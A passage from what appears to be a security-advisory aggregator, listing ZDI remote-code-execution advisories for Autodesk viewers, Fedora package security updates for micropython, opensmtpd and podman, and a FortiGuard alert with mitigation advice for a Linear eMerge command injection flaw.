This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk DWG TrueView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-23138.
Category Archives: Advisories
ZDI-24-295: Autodesk FBX Review ABC File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk FBX Review. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-23139.
micropython-1.22.2-1.fc39
FEDORA-2024-34aa24af35
Packages in this update:
micropython-1.22.2-1.fc39
Update description:
Update to 1.22.2
Security fixes for CVE-2023-7158 and CVE-2023-7152
micropython-1.22.2-1.fc40
FEDORA-2024-a3b517705e
Packages in this update:
micropython-1.22.2-1.fc40
Update description:
Update to 1.22.2
Security fixes for CVE-2023-7158 and CVE-2023-7152
micropython-1.22.2-1.fc38
FEDORA-2024-51e55a7065
Packages in this update:
micropython-1.22.2-1.fc38
Update description:
Update to 1.22.2
Security fixes for CVE-2023-7158 and CVE-2023-7152
Nice Linear eMerge Command Injection Vulnerability (CVE-2019–7256)
What is the vulnerability?
Cyber threat actors are actively targeting Linear eMerge E3-Series to exploit a 5-year-old critical vulnerability. The vulnerability tracked as CVE-2019-7256 is a command injection flaw that could allow an attacker to cause remote code execution and full access to the system.
The Nice Linear eMerge E3-Series is a popular access control system used in various commercial and industrial environments worldwide which underscores the importance of the potential widespread impact of this vulnerability.
What is the recommended Mitigation?
Nice has released a security bulletin that advises users to apply the latest firmware to mitigate the risk and recommends defensive measures to minimize the risk of exploitation. https://linear-solutions.com/wp-content/uploads/Service-Bulletin-for-Telephone-Entry-Products-04-12-2023.pdf
What FortiGuard Coverage is available?
FortiGuard Labs has an existing IPS signature “Linear.eMerge.card_scan_decoder.php.Command.Injection” to block any attack attempts targeting the vulnerability and has an OT virtual patch available for auto-patching.
Fortinet customers remain protected by the vulnerability; however, it is recommended to apply firmware patches released by the vendor to mitigate any risks.
micropython-1.22.2-1.fc41
FEDORA-2024-9f2a705459
Packages in this update:
micropython-1.22.2-1.fc41
Update description:
Automatic update for micropython-1.22.2-1.fc41.
Changelog
* Fri Mar 22 2024 Charalampos Stratakis <cstratak@redhat.com> – 1.22.2-1
– Update to 1.22.2
– Security fixes for CVE-2023-7158 and CVE-2023-7152
– Fixes: rhbz#2256176, rhbz#2256178, rhbz#2259215
* Thu Jan 25 2024 Fedora Release Engineering <releng@fedoraproject.org> – 1.21.0-3
– Rebuilt for https://fedoraproject.org/wiki/Fedora_40_Mass_Rebuild
* Sun Jan 21 2024 Fedora Release Engineering <releng@fedoraproject.org> – 1.21.0-2
– Rebuilt for https://fedoraproject.org/wiki/Fedora_40_Mass_Rebuild
opensmtpd-7.4.0p1-1.el9
FEDORA-EPEL-2024-5e764f8789
Packages in this update:
opensmtpd-7.4.0p1-1.el9
Update description:
opensmtpd: 7.4.0p1 release
opensmtpd-7.4.0p1-1.fc40
FEDORA-2024-28fde3feb7
Packages in this update:
opensmtpd-7.4.0p1-1.fc40
Update description:
opensmtpd: 7.4.0p1 release
podman-4.9.4-1.fc39
FEDORA-2024-dd32f390b3
Packages in this update:
podman-4.9.4-1.fc39
Update description:
Security fix for CVE-2024-1753
Automatic update for podman-4.9.4-1.fc39.
Changelog for podman
* Mon Mar 25 2024 Packit <hello@packit.dev> – 5:4.9.4-1
– [packit] 4.9.4 upstream release
* Fri Mar 01 2024 Debarshi Ray <rishi@fedoraproject.org> – 5:4.9.3-5
– Show the toolbox RPMs used to run the tests
* Fri Mar 01 2024 Debarshi Ray <rishi@fedoraproject.org> – 5:4.9.3-4
– Avoid running out of storage space when running the Toolbx tests
* Fri Mar 01 2024 Debarshi Ray <rishi@fedoraproject.org> – 5:4.9.3-3
– Silence warnings about deprecated grep(1) use in test logs
* Fri Mar 01 2024 Debarshi Ray <rishi@fedoraproject.org> – 5:4.9.3-2
– Update how Toolbx is spelt